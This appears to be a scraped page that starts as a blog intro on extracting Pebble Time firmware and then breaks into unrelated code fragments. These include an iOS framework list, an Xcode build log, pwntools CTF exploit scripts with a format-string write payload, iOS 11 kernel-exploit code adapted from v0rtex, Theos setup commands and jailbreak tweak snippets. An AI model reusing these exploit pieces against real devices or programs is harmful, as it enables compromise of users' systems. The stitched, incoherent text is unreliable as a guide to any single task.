#Introduction I recently got a Pebble Time for my cake day, and wanted to see what I could do with it outside watchfaces and apps.
#Before everything else I was able to accomplish all of below by using Pebble Firmware Utils by MarSoft (https://github.com/MarSoft/pebble-firmware-utils). Python 2.7 is required to get the firmware files. Run the following:
cd pebble-firmware-utils python downloadFirmware.py python unpackFirmware.py [file_name].pbz cd pebble_firmware
| Added: | |
| - /System/Library/AccessibilityBundles/AXActionSheetUIServer.axuiservice/AXActionSheetUIServer | |
| - /System/Library/Frameworks/AuthenticationServices.framework/AuthenticationServices | |
| - /System/Library/Frameworks/CarPlay.framework/CarPlay | |
| - /System/Library/Frameworks/CoreServices.framework/CoreServices | |
| - /System/Library/Frameworks/CoreTelephony.framework/Support/libSystemDetermination.dylib | |
| - /System/Library/Frameworks/GLKit.framework/GLKit | |
| - /System/Library/Frameworks/IdentityLookupUI.framework/IdentityLookupUI | |
| - /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSRayIntersector.framework/MPSRayIntersector | |
| - /System/Library/Frameworks/NaturalLanguage.framework/NaturalLanguage |
| Showing All Messages | |
| Build target Limitless of project Limitless with configuration Debug | |
| PhaseScriptExecution Symlinks\ Setup /Users/ninja/Library/Developer/Xcode/DerivedData/Limitless-ffaafdspyfyrqgberifhaiobmnbg/Build/Intermediates/Limitless.build/Debug-iphoneos/Limitless.build/Script-FA25322E1DE0FB2800D4FA86.sh | |
| cd /Volumes/Files/Developer/Limitless | |
| export ACTION=build | |
| export AD_HOC_CODE_SIGNING_ALLOWED=NO | |
| export ALTERNATE_GROUP=staff |
| from pwn import * | |
| bin_path = "./neo_boffy" | |
| # Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries | |
| context(log_level="ERROR") | |
| # Can't send NULLs, but can send empty strings | |
| def cmdify(str): return str.split("\x00") |
| from pwn import * | |
| bin_path = "./fat_morphine" | |
| payload = "" | |
| payload += "%4196134x" # What we are writing | |
| payload += "%{}$lln" # How we write it | |
| payload += "\x30\x0d\x60" # Where we write it | |
| payload = payload.format(10) |
| /* | |
| Offsets from iOS 11.1.2 iPhone 6+ | |
| Insert the following after line 680 in async_wait.c | |
| Mostly from Siguza's v0rtex | |
| */ | |
| mach_ports_register(mach_task_self(), &user_client, 1); | |
| uint64_t IOSurfaceRootUserClient_port = rk64(task_addr + 0x2e8 + 0x8); // 0x2e8 = OFFSET_TASK_ITK_REGISTERED, second port in the list | |
| uint64_t IOSurfaceRootUserClient_addr = rk64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); | |
| uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_addr); |
| brew install dpkg ldid | |
| cd ~ | |
| git clone --recursive https://github.com/theos/theos.git | |
| echo "export THEOS=~/theos" >> .bash_profile |
| @interface SBApplicationController | |
| +(id)sharedInstance; | |
| -(id)applicationWithBundleIdentifier:(id)arg1 ; | |
| @end | |
| @interface SBApplication | |
| @end | |
| @interface SBApplicationIcon : NSObject | |
| -(id)initWithApplication:(id)arg1 ; |
| ... | |
| @property (strong, nonatomic) NSString *currentPhoneNumber; | |
| ... | |
| -(NSMutableArray*)getHiddenNumbers { | |
| NSArray *hiddenNumbers = [[NSUserDefaults standardUserDefaults] objectForKey:@"hiddenNumbers"]; | |
| if (hiddenNumbers == nil) { | |
| return [[NSMutableArray alloc] init]; | |
| } | |
| return [NSMutableArray arrayWithArray:hiddenNumbers]; |
| SBUIController - NO (Protected by FrontBoard) | |
| SBIconController - NO (Protected by FrontBoard) | |
| SBPowerDownController - YES (assertion failure in -[SBPowerDownController _screen]) | |
| SBWallpaperController - NO (Protected by FrontBoard) | |
| SpringBoard (actual app) - YES (Not sure how to fetch, Only one UIApp can be active at one time) |